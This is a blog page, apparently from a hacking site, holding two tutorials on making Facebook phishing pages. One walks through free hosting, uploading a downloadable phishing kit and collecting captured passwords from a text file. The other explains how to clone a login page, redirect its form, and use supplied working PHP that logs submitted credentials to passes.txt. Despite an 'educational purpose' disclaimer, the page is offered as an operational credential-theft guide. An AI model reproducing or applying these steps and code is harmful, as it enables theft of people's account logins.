Visit our official website APAJR Lab


Showing posts with label facebook phishing. Show all posts
Showing posts with label facebook phishing. Show all posts

Thursday, 17 April 2014

Hack Facebook | Phishing | Full Tutorial

| |
0 comments
Facebook Phishing full tutorial 





Step 1: The First Step in Making the site is to regester an account at http://www.2freehosting.com/signup.html (if you have account than you can skip first 2 steps)



  Step 2: Now Goto your email account that you gave and confirm your account with confirmation  link

Step 3: Now Download this File
                                               
http://adfoc.us/22615841923257


Step 4: Now Go to http://cpanel.2freehosting.com/ and Log into your account.




Step 5: Now when you are logged into your account click on the Go to Cpanel and click on create a new account





 
Step 6 :  Select free hosting and click on the select button




 
Step 7 :  Enter your domain name and the following detail and click create


 Step 8 : click on the switch button.



Step 9 :  Go to file section  and click on file manager



Step 10 : click on install button



Step 11 :  wait till the file manager pops up
.



 
Step 12 :  click on upload button and upload the downloaded file (mentioned above).



 
NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.yzi.me/indihackpass.txt

If I am not clear in any point Please ask me in comments below.

=============================================================
The Input Data (Email and Password) will look like following:



==============================================================
Now Facebook phishing page is successfully created





  
Read More

Tuesday, 25 December 2012

Make Phishing Page of any site | .::APAJR::.

| |
0 comments
This tutorial is for educational purpose only.







Warning & Disclaimer:

Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then we will not responsible for it. Do anything on your own risk.

What is phishing page?

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page.

How to create?


    • Visit the page that you want to clone.

    • Save it (CTRL+S) via your browser.

    • Choose save complete webpage while saving it via browser.

    • Give name index while saving. (Dont use other name!)

    • Save it to a folder.

    • Now, you should have one file named "index.htm" and a folder.

    • We have to edit index.htm file.

    • Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php?login_attempt=1" method="post" , We have to edit this line only. Changehttps://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.

How to create login.php?

      Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php.


      Code:

<?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>




        You have to change

    http://www.google.com

         to the site url that you are cloning, for example, change it to

    http://www.facebook.com/

         if you are cloning facebook.


        Now, you have your phishing page.
         
        Face book phishing page here
         
                               
        http://adfoc.us/22646341924526
         
         
         
         

    Read More
    Powered by Blogger.